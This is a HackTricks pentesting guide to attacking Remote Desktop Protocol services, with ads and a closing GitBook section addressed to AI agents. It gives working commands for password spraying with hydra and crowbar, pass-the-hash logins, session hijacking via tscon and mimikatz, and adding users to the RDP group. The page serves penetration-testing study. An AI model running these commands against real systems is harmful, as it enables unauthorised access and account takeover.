> For the complete documentation index, see [llms.txt](https://angelica.gitbook.io/hacktricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://angelica.gitbook.io/hacktricks/network-services-pentesting/pentesting-rdp.md).
# 3389 - Pentesting RDP
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**Get a hacker's perspective on your web apps, network, and cloud**
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
{% embed url="" %}
## Basic Information
Developed by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
**Default port:** 3389
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
## Enumeration
### Automatic
{% code overflow="wrap" %}
```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4
```
{% endcode %}
It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).
### [Brute force](/hacktricks/generic-methodologies-and-resources/brute-force.md#rdp)
**Be careful, you could lock accounts**
### **Password Spraying**
**Be careful, you could lock accounts**
```bash
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
### Connect with known credentials/hash
```bash
rdesktop -u
rdesktop -d -u -p
xfreerdp [/d:domain] /u: /p: /v:
xfreerdp [/d:domain] /u: /pth: /v: #Pass the hash
```
### Check known credentials against RDP services
rdp\_check.py from impacket let you check if some credentials are valid for a RDP service:
```bash
rdp_check /:@
```
**Get a hacker's perspective on your web apps, network, and cloud**
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
{% embed url="" %}
## **Attacks**
### Session stealing
With **SYSTEM permissions** you can access any **opened RDP session by any user** without need to know the password of the owner.
**Get openned sessions:**
```
query user
```
**Access to the selected session**
```bash
tscon /dest:
```
Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.
**Important**: When you access an active RDP sessions you will kickoff the user that was using it.
You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)
#### **Mimikatz**
You could also use mimikatz to do this:
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
### Sticky-keys & Utilman
Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime**
You can search RDPs that have been backdoored with one of these techniques already with:
### RDP Process Injection
If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him:
{% content-ref url="/pages/e9nYqxeGEEIblcOUuBwP" %}
[RDP Sessions Abuse](/hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
{% endcontent-ref %}
### Adding User to RDP group
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
## Automatic Tools
* [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to **view his victim's desktop without his consent**, and even control it on demand, using tools native to the operating system itself.
* [**EvilRDP**](https://github.com/skelsec/evilrdp)
* Control mouse and keyboard in an automated way from command line
* Control clipboard in an automated way from command line
* Spawn a SOCKS proxy from the client that channels network communication to the target via RDP
* Execute arbitrary SHELL and PowerShell commands on the target without uploading files
* Upload and download files to/from the target even when file transfers are disabled on the target
## HackTricks Automatic Commands
```
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
```
**Get a hacker's perspective on your web apps, network, and cloud**
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
{% embed url="" %}
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://angelica.gitbook.io/hacktricks/network-services-pentesting/pentesting-rdp.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.